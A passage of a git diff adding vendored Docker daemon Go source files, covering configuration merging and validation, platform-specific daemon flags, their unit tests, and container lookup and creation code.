continue + } + + flatten[k] = v + } + return flatten +} + +// findConfigurationConflicts iterates over the provided flags searching for +// duplicated configurations and unknown keys. It returns an error with all the conflicts if +// it finds any. +func findConfigurationConflicts(config map[string]interface{}, flags *pflag.FlagSet) error { + // 1. Search keys from the file that we don't recognize as flags. + unknownKeys := make(map[string]interface{}) + for key, value := range config { + if flag := flags.Lookup(key); flag == nil { + unknownKeys[key] = value + } + } + + // 2. Discard values that implement NamedOption. + // Their configuration name differs from their flag name, like `labels` and `label`. + if len(unknownKeys) > 0 { + unknownNamedConflicts := func(f *pflag.Flag) { + if namedOption, ok := f.Value.(opts.NamedOption); ok { + if _, valid := unknownKeys[namedOption.Name()]; valid { + delete(unknownKeys, namedOption.Name()) + } + } + } + flags.VisitAll(unknownNamedConflicts) + } + + if len(unknownKeys) > 0 { + var unknown []string + for key := range unknownKeys { + unknown = append(unknown, key) + } + return fmt.Errorf("the following directives don't match any configuration option: %s", strings.Join(unknown, ", ")) + } + + var conflicts []string + printConflict := func(name string, flagValue, fileValue interface{}) string { + return fmt.Sprintf("%s: (from flag: %v, from file: %v)", name, flagValue, fileValue) + } + + // 3. Search keys that are present as a flag and as a file option. + duplicatedConflicts := func(f *pflag.Flag) { + // search option name in the json configuration payload if the value is a named option + if namedOption, ok := f.Value.(opts.NamedOption); ok { + if optsValue, ok := config[namedOption.Name()]; ok { + conflicts = append(conflicts, printConflict(namedOption.Name(), f.Value.String(), optsValue)) + } + } else { + // search flag name in the json configuration payload + for _, name := range []string{f.Name, f.Shorthand} { + if value, ok := config[name]; ok { + conflicts = append(conflicts, printConflict(name, f.Value.String(), value)) + break + } + } + } + } + + flags.Visit(duplicatedConflicts) + + if len(conflicts) > 0 { + return fmt.Errorf("the following directives are specified both as a flag and in the configuration file: %s", strings.Join(conflicts, ", ")) + } + return nil +} + +// ValidateConfiguration validates some specific configs. +// such as config.DNS, config.Labels, config.DNSSearch, +// as well as config.MaxConcurrentDownloads, config.MaxConcurrentUploads. +func ValidateConfiguration(config *Config) error { + // validate DNS + for _, dns := range config.DNS { + if _, err := opts.ValidateIPAddress(dns); err != nil { + return err + } + } + + // validate DNSSearch + for _, dnsSearch := range config.DNSSearch { + if _, err := opts.ValidateDNSSearch(dnsSearch); err != nil { + return err + } + } + + // validate Labels + for _, label := range config.Labels { + if _, err := opts.ValidateLabel(label); err != nil { + return err + } + } + + // validate MaxConcurrentDownloads + if config.IsValueSet("max-concurrent-downloads") && config.MaxConcurrentDownloads != nil && *config.MaxConcurrentDownloads < 0 { + return fmt.Errorf("invalid max concurrent downloads: %d", *config.MaxConcurrentDownloads) + } + + // validate MaxConcurrentUploads + if config.IsValueSet("max-concurrent-uploads") && config.MaxConcurrentUploads != nil && *config.MaxConcurrentUploads < 0 { + return fmt.Errorf("invalid max concurrent uploads: %d", *config.MaxConcurrentUploads) + } + + // validate that "default" runtime is not reset + if runtimes := config.GetAllRuntimes(); len(runtimes) > 0 { + if _, ok := runtimes[stockRuntimeName]; ok { + return fmt.Errorf("runtime name '%s' is reserved", stockRuntimeName) + } + } + + if defaultRuntime := config.GetDefaultRuntimeName(); defaultRuntime != "" && defaultRuntime != stockRuntimeName { + runtimes := config.GetAllRuntimes() + if _, ok := runtimes[defaultRuntime]; !ok { + return fmt.Errorf("specified default runtime '%s' does not exist", defaultRuntime) + } + } + + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/config_common_unix.go b/vendor/github.com/docker/docker/daemon/config_common_unix.go new file mode 100644 index 0000000000..ab76fe7b1b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/config_common_unix.go @@ -0,0 +1,90 @@ +// +build solaris linux freebsd + +package daemon + +import ( + "net" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/opts" + runconfigopts "github.com/docker/docker/runconfig/opts" + "github.com/spf13/pflag" +) + +// CommonUnixConfig defines configuration of a docker daemon that is +// common across Unix platforms. +type CommonUnixConfig struct { + ExecRoot string `json:"exec-root,omitempty"` + ContainerdAddr string `json:"containerd,omitempty"` + Runtimes map[string]types.Runtime `json:"runtimes,omitempty"` + DefaultRuntime string `json:"default-runtime,omitempty"` +} + +type commonUnixBridgeConfig struct { + DefaultIP net.IP `json:"ip,omitempty"` + IP string `json:"bip,omitempty"` + DefaultGatewayIPv4 net.IP `json:"default-gateway,omitempty"` + DefaultGatewayIPv6 net.IP `json:"default-gateway-v6,omitempty"` + InterContainerCommunication bool `json:"icc,omitempty"` +} + +// InstallCommonUnixFlags adds command-line options to the top-level flag parser for +// the current process that are common across Unix platforms. +func (config *Config) InstallCommonUnixFlags(flags *pflag.FlagSet) { + config.Runtimes = make(map[string]types.Runtime) + + flags.StringVarP(&config.SocketGroup, "group", "G", "docker", "Group for the unix socket") + flags.StringVar(&config.bridgeConfig.IP, "bip", "", "Specify network bridge IP") + flags.StringVarP(&config.bridgeConfig.Iface, "bridge", "b", "", "Attach containers to a network bridge") + flags.StringVar(&config.bridgeConfig.FixedCIDR, "fixed-cidr", "", "IPv4 subnet for fixed IPs") + flags.Var(opts.NewIPOpt(&config.bridgeConfig.DefaultGatewayIPv4, ""), "default-gateway", "Container default gateway IPv4 address") + flags.Var(opts.NewIPOpt(&config.bridgeConfig.DefaultGatewayIPv6, ""), "default-gateway-v6", "Container default gateway IPv6 address") + flags.BoolVar(&config.bridgeConfig.InterContainerCommunication, "icc", true, "Enable inter-container communication") + flags.Var(opts.NewIPOpt(&config.bridgeConfig.DefaultIP, "0.0.0.0"), "ip", "Default IP when binding container ports") + flags.Var(runconfigopts.NewNamedRuntimeOpt("runtimes", &config.Runtimes, stockRuntimeName), "add-runtime", "Register an additional OCI compatible runtime") + flags.StringVar(&config.DefaultRuntime, "default-runtime", stockRuntimeName, "Default OCI runtime for containers") + +} + +// GetRuntime returns the runtime path and arguments for a given +// runtime name +func (config *Config) GetRuntime(name string) *types.Runtime { + config.reloadLock.Lock() + defer config.reloadLock.Unlock() + if rt, ok := config.Runtimes[name]; ok { + return &rt + } + return nil +} + +// GetDefaultRuntimeName returns the current default runtime +func (config *Config) GetDefaultRuntimeName() string { + config.reloadLock.Lock() + rt := config.DefaultRuntime + config.reloadLock.Unlock() + + return rt +} + +// GetAllRuntimes returns a copy of the runtimes map +func (config *Config) GetAllRuntimes() map[string]types.Runtime { + config.reloadLock.Lock() + rts := config.Runtimes + config.reloadLock.Unlock() + return rts +} + +// GetExecRoot returns the user configured Exec-root +func (config *Config) GetExecRoot() string { + return config.ExecRoot +} + +// GetInitPath returns the configure docker-init path +func (config *Config) GetInitPath() string { + config.reloadLock.Lock() + defer config.reloadLock.Unlock() + if config.InitPath != "" { + return config.InitPath + } + return DefaultInitBinary +} diff --git a/vendor/github.com/docker/docker/daemon/config_experimental.go b/vendor/github.com/docker/docker/daemon/config_experimental.go new file mode 100644 index 0000000000..963a51e5a3 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/config_experimental.go @@ -0,0 +1,8 @@ +package daemon + +import ( + "github.com/spf13/pflag" +) + +func (config *Config) attachExperimentalFlags(cmd *pflag.FlagSet) { +} diff --git a/vendor/github.com/docker/docker/daemon/config_solaris.go b/vendor/github.com/docker/docker/daemon/config_solaris.go new file mode 100644 index 0000000000..bc18ccd7e4 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/config_solaris.go @@ -0,0 +1,47 @@ +package daemon + +import ( + "github.com/spf13/pflag" +) + +var ( + defaultPidFile = "/system/volatile/docker/docker.pid" + defaultGraph = "/var/lib/docker" + defaultExec = "zones" +) + +// Config defines the configuration of a docker daemon. +// These are the configuration settings that you pass +// to the docker daemon when you launch it with say: `docker -d -e lxc` +type Config struct { + CommonConfig + + // These fields are common to all unix platforms. + CommonUnixConfig +} + +// bridgeConfig stores all the bridge driver specific +// configuration. +type bridgeConfig struct { + commonBridgeConfig + + // Fields below here are platform specific. + commonUnixBridgeConfig +} + +// InstallFlags adds command-line options to the top-level flag parser for +// the current process. +func (config *Config) InstallFlags(flags *pflag.FlagSet) { + // First handle install flags which are consistent cross-platform + config.InstallCommonFlags(flags) + + // Then install flags common to unix platforms + config.InstallCommonUnixFlags(flags) + + // Then platform-specific install flags + config.attachExperimentalFlags(flags) +} + +func (config *Config) isSwarmCompatible() error { + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/config_test.go b/vendor/github.com/docker/docker/daemon/config_test.go new file mode 100644 index 0000000000..90f6a1277f --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/config_test.go @@ -0,0 +1,229 @@ +package daemon + +import ( + "io/ioutil" + "os" + "runtime" + "strings" + "testing" + + "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/testutil/assert" + "github.com/spf13/pflag" +) + +func TestDaemonConfigurationNotFound(t *testing.T) { + _, err := MergeDaemonConfigurations(&Config{}, nil, "/tmp/foo-bar-baz-docker") + if err == nil || !os.IsNotExist(err) { + t.Fatalf("expected does not exist error, got %v", err) + } +} + +func TestDaemonBrokenConfiguration(t *testing.T) { + f, err := ioutil.TempFile("", "docker-config-") + if err != nil { + t.Fatal(err) + } + + configFile := f.Name() + f.Write([]byte(`{"Debug": tru`)) + f.Close() + + _, err = MergeDaemonConfigurations(&Config{}, nil, configFile) + if err == nil { + t.Fatalf("expected error, got %v", err) + } +} + +func TestParseClusterAdvertiseSettings(t *testing.T) { + if runtime.GOOS == "solaris" { + t.Skip("ClusterSettings not supported on Solaris\n") + } + _, err := parseClusterAdvertiseSettings("something", "") + if err != errDiscoveryDisabled { + t.Fatalf("expected discovery disabled error, got %v\n", err) + } + + _, err = parseClusterAdvertiseSettings("", "something") + if err == nil { + t.Fatalf("expected discovery store error, got %v\n", err) + } + + _, err = parseClusterAdvertiseSettings("etcd", "127.0.0.1:8080") + if err != nil { + t.Fatal(err) + } +} + +func TestFindConfigurationConflicts(t *testing.T) { + config := map[string]interface{}{"authorization-plugins": "foobar"} + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + + flags.String("authorization-plugins", "", "") + assert.NilError(t, flags.Set("authorization-plugins", "asdf")) + + assert.Error(t, + findConfigurationConflicts(config, flags), + "authorization-plugins: (from flag: asdf, from file: foobar)") +} + +func TestFindConfigurationConflictsWithNamedOptions(t *testing.T) { + config := map[string]interface{}{"hosts": []string{"qwer"}} + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + + var hosts []string + flags.VarP(opts.NewNamedListOptsRef("hosts", &hosts, opts.ValidateHost), "host", "H", "Daemon socket(s) to connect to") + assert.NilError(t, flags.Set("host", "tcp://127.0.0.1:4444")) + assert.NilError(t, flags.Set("host", "unix:///var/run/docker.sock")) + + assert.Error(t, findConfigurationConflicts(config, flags), "hosts") +} + +func TestDaemonConfigurationMergeConflicts(t *testing.T) { + f, err := ioutil.TempFile("", "docker-config-") + if err != nil { + t.Fatal(err) + } + + configFile := f.Name() + f.Write([]byte(`{"debug": true}`)) + f.Close() + + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + flags.Bool("debug", false, "") + flags.Set("debug", "false") + + _, err = MergeDaemonConfigurations(&Config{}, flags, configFile) + if err == nil { + t.Fatal("expected error, got nil") + } + if !strings.Contains(err.Error(), "debug") { + t.Fatalf("expected debug conflict, got %v", err) + } +} + +func TestDaemonConfigurationMergeConflictsWithInnerStructs(t *testing.T) { + f, err := ioutil.TempFile("", "docker-config-") + if err != nil { + t.Fatal(err) + } + + configFile := f.Name() + f.Write([]byte(`{"tlscacert": "/etc/certificates/ca.pem"}`)) + f.Close() + + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + flags.String("tlscacert", "", "") + flags.Set("tlscacert", "~/.docker/ca.pem") + + _, err = MergeDaemonConfigurations(&Config{}, flags, configFile) + if err == nil { + t.Fatal("expected error, got nil") + } + if !strings.Contains(err.Error(), "tlscacert") { + t.Fatalf("expected tlscacert conflict, got %v", err) + } +} + +func TestFindConfigurationConflictsWithUnknownKeys(t *testing.T) { + config := map[string]interface{}{"tls-verify": "true"} + flags := pflag.NewFlagSet("test", pflag.ContinueOnError) + + flags.Bool("tlsverify", false, "") + err := findConfigurationConflicts(config, flags) + if err == nil { + t.Fatal("expected error, got nil") + } + if !strings.Contains(err.Error(), "the following directives don't match any configuration option: tls-verify") { + t.Fatalf("expected tls-verify conflict, got %v", err) + } +} + +func TestFindConfigurationConflictsWithMergedValues(t *testing.T) { + var hosts []string + config := map[string]interface{}{"hosts": "tcp://127.0.0.1:2345"} + flags := pflag.NewFlagSet("base", pflag.ContinueOnError) + flags.VarP(opts.NewNamedListOptsRef("hosts", &hosts, nil), "host", "H", "") + + err := findConfigurationConflicts(config, flags) + if err != nil { + t.Fatal(err) + } + + flags.Set("host", "unix:///var/run/docker.sock") + err = findConfigurationConflicts(config, flags) + if err == nil { + t.Fatal("expected error, got nil") + } + if !strings.Contains(err.Error(), "hosts: (from flag: [unix:///var/run/docker.sock], from file: tcp://127.0.0.1:2345)") { + t.Fatalf("expected hosts conflict, got %v", err) + } +} + +func TestValidateConfiguration(t *testing.T) { + c1 := &Config{ + CommonConfig: CommonConfig{ + Labels: []string{"one"}, + }, + } + + err := ValidateConfiguration(c1) + if err == nil { + t.Fatal("expected error, got nil") + } + + c2 := &Config{ + CommonConfig: CommonConfig{ + Labels: []string{"one=two"}, + }, + } + + err = ValidateConfiguration(c2) + if err != nil { + t.Fatalf("expected no error, got error %v", err) + } + + c3 := &Config{ + CommonConfig: CommonConfig{ + DNS: []string{"1.1.1.1"}, + }, + } + + err = ValidateConfiguration(c3) + if err != nil { + t.Fatalf("expected no error, got error %v", err) + } + + c4 := &Config{ + CommonConfig: CommonConfig{ + DNS: []string{"1.1.1.1o"}, + }, + } + + err = ValidateConfiguration(c4) + if err == nil { + t.Fatal("expected error, got nil") + } + + c5 := &Config{ + CommonConfig: CommonConfig{ + DNSSearch: []string{"a.b.c"}, + }, + } + + err = ValidateConfiguration(c5) + if err != nil { + t.Fatalf("expected no error, got error %v", err) + } + + c6 := &Config{ + CommonConfig: CommonConfig{ + DNSSearch: []string{"123456"}, + }, + } + + err = ValidateConfiguration(c6) + if err == nil { + t.Fatal("expected error, got nil") + } +} diff --git a/vendor/github.com/docker/docker/daemon/config_unix.go b/vendor/github.com/docker/docker/daemon/config_unix.go new file mode 100644 index 0000000000..d0957884b3 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/config_unix.go @@ -0,0 +1,104 @@ +// +build linux freebsd + +package daemon + +import ( + "fmt" + + runconfigopts "github.com/docker/docker/runconfig/opts" + units "github.com/docker/go-units" + "github.com/spf13/pflag" +) + +var ( + defaultPidFile = "/var/run/docker.pid" + defaultGraph = "/var/lib/docker" + defaultExecRoot = "/var/run/docker" +) + +// Config defines the configuration of a docker daemon. +// It includes json tags to deserialize configuration from a file +// using the same names that the flags in the command line uses. +type Config struct { + CommonConfig + + // These fields are common to all unix platforms. + CommonUnixConfig + + // Fields below here are platform specific. + CgroupParent string `json:"cgroup-parent,omitempty"` + EnableSelinuxSupport bool `json:"selinux-enabled,omitempty"` + RemappedRoot string `json:"userns-remap,omitempty"` + Ulimits map[string]*units.Ulimit `json:"default-ulimits,omitempty"` + CPURealtimePeriod int64 `json:"cpu-rt-period,omitempty"` + CPURealtimeRuntime int64 `json:"cpu-rt-runtime,omitempty"` + OOMScoreAdjust int `json:"oom-score-adjust,omitempty"` + Init bool `json:"init,omitempty"` + InitPath string `json:"init-path,omitempty"` + SeccompProfile string `json:"seccomp-profile,omitempty"` +} + +// bridgeConfig stores all the bridge driver specific +// configuration. +type bridgeConfig struct { + commonBridgeConfig + + // These fields are common to all unix platforms. + commonUnixBridgeConfig + + // Fields below here are platform specific. + EnableIPv6 bool `json:"ipv6,omitempty"` + EnableIPTables bool `json:"iptables,omitempty"` + EnableIPForward bool `json:"ip-forward,omitempty"` + EnableIPMasq bool `json:"ip-masq,omitempty"` + EnableUserlandProxy bool `json:"userland-proxy,omitempty"` + UserlandProxyPath string `json:"userland-proxy-path,omitempty"` + FixedCIDRv6 string `json:"fixed-cidr-v6,omitempty"` +} + +// InstallFlags adds flags to the pflag.FlagSet to configure the daemon +func (config *Config) InstallFlags(flags *pflag.FlagSet) { + // First handle install flags which are consistent cross-platform + config.InstallCommonFlags(flags) + + // Then install flags common to unix platforms + config.InstallCommonUnixFlags(flags) + + config.Ulimits = make(map[string]*units.Ulimit) + + // Then platform-specific install flags + flags.BoolVar(&config.EnableSelinuxSupport, "selinux-enabled", false, "Enable selinux support") + flags.Var(runconfigopts.NewUlimitOpt(&config.Ulimits), "default-ulimit", "Default ulimits for containers") + flags.BoolVar(&config.bridgeConfig.EnableIPTables, "iptables", true, "Enable addition of iptables rules") + flags.BoolVar(&config.bridgeConfig.EnableIPForward, "ip-forward", true, "Enable net.ipv4.ip_forward") + flags.BoolVar(&config.bridgeConfig.EnableIPMasq, "ip-masq", true, "Enable IP masquerading") + flags.BoolVar(&config.bridgeConfig.EnableIPv6, "ipv6", false, "Enable IPv6 networking") + flags.StringVar(&config.ExecRoot, "exec-root", defaultExecRoot, "Root directory for execution state files") + flags.StringVar(&config.bridgeConfig.FixedCIDRv6, "fixed-cidr-v6", "", "IPv6 subnet for fixed IPs") + flags.BoolVar(&config.bridgeConfig.EnableUserlandProxy, "userland-proxy", true, "Use userland proxy for loopback traffic") + flags.StringVar(&config.bridgeConfig.UserlandProxyPath, "userland-proxy-path", "", "Path to the userland proxy binary") + flags.BoolVar(&config.EnableCors, "api-enable-cors", false, "Enable CORS headers in the Engine API, this is deprecated by --api-cors-header") + flags.MarkDeprecated("api-enable-cors", "Please use --api-cors-header") + flags.StringVar(&config.CgroupParent, "cgroup-parent", "", "Set parent cgroup for all containers") + flags.StringVar(&config.RemappedRoot, "userns-remap", "", "User/Group setting for user namespaces") + flags.StringVar(&config.ContainerdAddr, "containerd", "", "Path to containerd socket") + flags.BoolVar(&config.LiveRestoreEnabled, "live-restore", false, "Enable live restore of docker when containers are still running") + flags.IntVar(&config.OOMScoreAdjust, "oom-score-adjust", -500, "Set the oom_score_adj for the daemon") + flags.BoolVar(&config.Init, "init", false, "Run an init in the container to forward signals and reap processes") + flags.StringVar(&config.InitPath, "init-path", "", "Path to the docker-init binary") + flags.Int64Var(&config.CPURealtimePeriod, "cpu-rt-period", 0, "Limit the CPU real-time period in microseconds") + flags.Int64Var(&config.CPURealtimeRuntime, "cpu-rt-runtime", 0, "Limit the CPU real-time runtime in microseconds") + flags.StringVar(&config.SeccompProfile, "seccomp-profile", "", "Path to seccomp profile") + + config.attachExperimentalFlags(flags) +} + +func (config *Config) isSwarmCompatible() error { + if config.ClusterStore != "" || config.ClusterAdvertise != "" { + return fmt.Errorf("--cluster-store and --cluster-advertise daemon configurations are incompatible with swarm mode") + } + if config.LiveRestoreEnabled { + return fmt.Errorf("--live-restore daemon configuration is incompatible with swarm mode") + } + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/config_unix_test.go b/vendor/github.com/docker/docker/daemon/config_unix_test.go new file mode 100644 index 0000000000..86c16f57ba --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/config_unix_test.go @@ -0,0 +1,80 @@ +// +build !windows + +package daemon + +import ( + "io/ioutil" + "testing" +) + +func TestDaemonConfigurationMerge(t *testing.T) { + f, err := ioutil.TempFile("", "docker-config-") + if err != nil { + t.Fatal(err) + } + + configFile := f.Name() + + f.Write([]byte(` + { + "debug": true, + "default-ulimits": { + "nofile": { + "Name": "nofile", + "Hard": 2048, + "Soft": 1024 + } + }, + "log-opts": { + "tag": "test_tag" + } + }`)) + + f.Close() + + c := &Config{ + CommonConfig: CommonConfig{ + AutoRestart: true, + LogConfig: LogConfig{ + Type: "syslog", + Config: map[string]string{"tag": "test"}, + }, + }, + } + + cc, err := MergeDaemonConfigurations(c, nil, configFile) + if err != nil { + t.Fatal(err) + } + if !cc.Debug { + t.Fatalf("expected %v, got %v\n", true, cc.Debug) + } + if !cc.AutoRestart { + t.Fatalf("expected %v, got %v\n", true, cc.AutoRestart) + } + if cc.LogConfig.Type != "syslog" { + t.Fatalf("expected syslog config, got %q\n", cc.LogConfig) + } + + if configValue, OK := cc.LogConfig.Config["tag"]; !OK { + t.Fatal("expected syslog config attributes, got nil\n") + } else { + if configValue != "test_tag" { + t.Fatalf("expected syslog config attributes 'tag=test_tag', got 'tag=%s'\n", configValue) + } + } + + if cc.Ulimits == nil { + t.Fatal("expected default ulimit config, got nil\n") + } else { + if _, OK := cc.Ulimits["nofile"]; OK { + if cc.Ulimits["nofile"].Name != "nofile" || + cc.Ulimits["nofile"].Hard != 2048 || + cc.Ulimits["nofile"].Soft != 1024 { + t.Fatalf("expected default ulimit name, hard and soft are nofile, 2048, 1024, got %s, %d, %d\n", cc.Ulimits["nofile"].Name, cc.Ulimits["nofile"].Hard, cc.Ulimits["nofile"].Soft) + } + } else { + t.Fatal("expected default ulimit name nofile, got nil\n") + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/config_windows.go b/vendor/github.com/docker/docker/daemon/config_windows.go new file mode 100644 index 0000000000..df59dcf302 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/config_windows.go @@ -0,0 +1,71 @@ +package daemon + +import ( + "os" + "path/filepath" + + "github.com/docker/docker/api/types" + "github.com/spf13/pflag" +) + +var ( + defaultPidFile string + defaultGraph = filepath.Join(os.Getenv("programdata"), "docker") +) + +// bridgeConfig stores all the bridge driver specific +// configuration. +type bridgeConfig struct { + commonBridgeConfig +} + +// Config defines the configuration of a docker daemon. +// These are the configuration settings that you pass +// to the docker daemon when you launch it with say: `docker daemon -e windows` +type Config struct { + CommonConfig + + // Fields below here are platform specific. (There are none presently + // for the Windows daemon.) +} + +// InstallFlags adds flags to the pflag.FlagSet to configure the daemon +func (config *Config) InstallFlags(flags *pflag.FlagSet) { + // First handle install flags which are consistent cross-platform + config.InstallCommonFlags(flags) + + // Then platform-specific install flags. + flags.StringVar(&config.bridgeConfig.FixedCIDR, "fixed-cidr", "", "IPv4 subnet for fixed IPs") + flags.StringVarP(&config.bridgeConfig.Iface, "bridge", "b", "", "Attach containers to a virtual switch") + flags.StringVarP(&config.SocketGroup, "group", "G", "", "Users or groups that can access the named pipe") +} + +// GetRuntime returns the runtime path and arguments for a given +// runtime name +func (config *Config) GetRuntime(name string) *types.Runtime { + return nil +} + +// GetInitPath returns the configure docker-init path +func (config *Config) GetInitPath() string { + return "" +} + +// GetDefaultRuntimeName returns the current default runtime +func (config *Config) GetDefaultRuntimeName() string { + return stockRuntimeName +} + +// GetAllRuntimes returns a copy of the runtimes map +func (config *Config) GetAllRuntimes() map[string]types.Runtime { + return map[string]types.Runtime{} +} + +// GetExecRoot returns the user configured Exec-root +func (config *Config) GetExecRoot() string { + return "" +} + +func (config *Config) isSwarmCompatible() error { + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/config_windows_test.go b/vendor/github.com/docker/docker/daemon/config_windows_test.go new file mode 100644 index 0000000000..4a7b95c17d --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/config_windows_test.go @@ -0,0 +1,59 @@ +// +build windows + +package daemon + +import ( + "io/ioutil" + "testing" +) + +func TestDaemonConfigurationMerge(t *testing.T) { + f, err := ioutil.TempFile("", "docker-config-") + if err != nil { + t.Fatal(err) + } + + configFile := f.Name() + + f.Write([]byte(` + { + "debug": true, + "log-opts": { + "tag": "test_tag" + } + }`)) + + f.Close() + + c := &Config{ + CommonConfig: CommonConfig{ + AutoRestart: true, + LogConfig: LogConfig{ + Type: "syslog", + Config: map[string]string{"tag": "test"}, + }, + }, + } + + cc, err := MergeDaemonConfigurations(c, nil, configFile) + if err != nil { + t.Fatal(err) + } + if !cc.Debug { + t.Fatalf("expected %v, got %v\n", true, cc.Debug) + } + if !cc.AutoRestart { + t.Fatalf("expected %v, got %v\n", true, cc.AutoRestart) + } + if cc.LogConfig.Type != "syslog" { + t.Fatalf("expected syslog config, got %q\n", cc.LogConfig) + } + + if configValue, OK := cc.LogConfig.Config["tag"]; !OK { + t.Fatal("expected syslog config attributes, got nil\n") + } else { + if configValue != "test_tag" { + t.Fatalf("expected syslog config attributes 'tag=test_tag', got 'tag=%s'\n", configValue) + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/container.go b/vendor/github.com/docker/docker/daemon/container.go new file mode 100644 index 0000000000..2a44800098 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/container.go @@ -0,0 +1,282 @@ +package daemon + +import ( + "fmt" + "os" + "path/filepath" + "time" + + "github.com/docker/docker/api/errors" + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/strslice" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/network" + "github.com/docker/docker/image" + "github.com/docker/docker/pkg/signal" + "github.com/docker/docker/pkg/system" + "github.com/docker/docker/pkg/truncindex" + "github.com/docker/docker/runconfig/opts" + "github.com/docker/go-connections/nat" +) + +// GetContainer looks for a container using the provided information, which could be +// one of the following inputs from the caller: +// - A full container ID, which will exact match a container in daemon's list +// - A container name, which will only exact match via the GetByName() function +// - A partial container ID prefix (e.g. short ID) of any length that is +// unique enough to only return a single container object +// If none of these searches succeed, an error is returned +func (daemon *Daemon) GetContainer(prefixOrName string) (*container.Container, error) { + if len(prefixOrName) == 0 { + return nil, errors.NewBadRequestError(fmt.Errorf("No container name or ID supplied")) + } + + if containerByID := daemon.containers.Get(prefixOrName); containerByID != nil { + // prefix is an exact match to a full container ID + return containerByID, nil + } + + // GetByName will match only an exact name provided; we ignore errors + if containerByName, _ := daemon.GetByName(prefixOrName); containerByName != nil { + // prefix is an exact match to a full container Name + return containerByName, nil + } + + containerID, indexError := daemon.idIndex.Get(prefixOrName) + if indexError != nil { + // When truncindex defines an error type, use that instead + if indexError == truncindex.ErrNotExist { + err := fmt.Errorf("No such container: %s", prefixOrName) + return nil, errors.NewRequestNotFoundError(err) + } + return nil, indexError + } + return daemon.containers.Get(containerID), nil +} + +// Exists returns a true if a container of the specified ID or name exists, +// false otherwise. +func (daemon *Daemon) Exists(id string) bool { + c, _ := daemon.GetContainer(id) + return c != nil +} + +// IsPaused returns a bool indicating if the specified container is paused. +func (daemon *Daemon) IsPaused(id string) bool { + c, _ := daemon.GetContainer(id) + return c.State.IsPaused() +} + +func (daemon *Daemon) containerRoot(id string) string { + return filepath.Join(daemon.repository, id) +} + +// Load reads the contents of a container from disk +// This is typically done at startup. +func (daemon *Daemon) load(id string) (*container.Container, error) { + container := daemon.newBaseContainer(id) + + if err := container.FromDisk(); err != nil { + return nil, err + } + + if container.ID != id { + return container, fmt.Errorf("Container %s is stored at %s", container.ID, id) + } + + return container, nil +} + +// Register makes a container object usable by the daemon as +func (daemon *Daemon) Register(c *container.Container) error { + // Attach to stdout and stderr + if c.Config.OpenStdin { + c.StreamConfig.NewInputPipes() + } else { + c.StreamConfig.NewNopInputPipe() + } + + daemon.containers.Add(c.ID, c) + daemon.idIndex.Add(c.ID) + + return nil +} + +func (daemon *Daemon) newContainer(name string, config *containertypes.Config, hostConfig *containertypes.HostConfig, imgID image.ID, managed bool) (*container.Container, error) { + var ( + id string + err error + noExplicitName = name == "" + ) + id, name, err = daemon.generateIDAndName(name) + if err != nil { + return nil, err + } + + if hostConfig.NetworkMode.IsHost() { + if config.Hostname == "" { + config.Hostname, err = os.Hostname() + if err != nil { + return nil, err + } + } + } else { + daemon.generateHostname(id, config) + } + entrypoint, args := daemon.getEntrypointAndArgs(config.Entrypoint, config.Cmd) + + base := daemon.newBaseContainer(id) + base.Created = time.Now().UTC() + base.Managed = managed + base.Path = entrypoint + base.Args = args //FIXME: de-duplicate from config + base.Config = config + base.HostConfig = &containertypes.HostConfig{} + base.ImageID = imgID + base.NetworkSettings = &network.Settings{IsAnonymousEndpoint: noExplicitName} + base.Name = name + base.Driver = daemon.GraphDriverName() + + return base, err +} + +// GetByName returns a container given a name. +func (daemon *Daemon) GetByName(name string) (*container.Container, error) { + if len(name) == 0 { + return nil, fmt.Errorf("No container name supplied") + } + fullName := name + if name[0] != '/' { + fullName = "/" + name + } + id, err := daemon.nameIndex.Get(fullName) + if err != nil { + return nil, fmt.Errorf("Could not find entity for %s", name) + } + e := daemon.containers.Get(id) + if e == nil { + return nil, fmt.Errorf("Could not find container for entity id %s", id) + } + return e, nil +} + +// newBaseContainer creates a new container with its initial +// configuration based on the root storage from the daemon. +func (daemon *Daemon) newBaseContainer(id string) *container.Container { + return container.NewBaseContainer(id, daemon.containerRoot(id)) +} + +func (daemon *Daemon) getEntrypointAndArgs(configEntrypoint strslice.StrSlice, configCmd strslice.StrSlice) (string, []string) { + if len(configEntrypoint) != 0 { + return configEntrypoint[0], append(configEntrypoint[1:], configCmd...) + } + return configCmd[0], configCmd[1:] +} + +func (daemon *Daemon) generateHostname(id string, config *containertypes.Config) { + // Generate default hostname + if config.Hostname == "" { + config.Hostname = id[:12] + } +} + +func (daemon *Daemon) setSecurityOptions(container *container.Container, hostConfig *containertypes.HostConfig) error { + container.Lock() + defer container.Unlock() + return parseSecurityOpt(container, hostConfig) +} + +func (daemon *Daemon) setHostConfig(container *container.Container, hostConfig *containertypes.HostConfig) error { + // Do not lock while creating volumes since this could be calling out to external plugins + // Don't want to block other actions, like `docker ps` because we're waiting on an external plugin + if err := daemon.registerMountPoints(container, hostConfig); err != nil { + return err + } + + container.Lock() + defer container.Unlock() + + // Register any links from the host config before starting the container + if err := daemon.registerLinks(container, hostConfig); err != nil { + return err + } + + // make sure links is not nil + // this ensures that on the next daemon restart we don't try to migrate from legacy sqlite links + if hostConfig.Links == nil { + hostConfig.Links = []string{} + } + + container.HostConfig = hostConfig + return container.ToDisk() +} + +// verifyContainerSettings performs validation of the hostconfig and config +// structures. +func (daemon *Daemon) verifyContainerSettings(hostConfig *containertypes.HostConfig, config 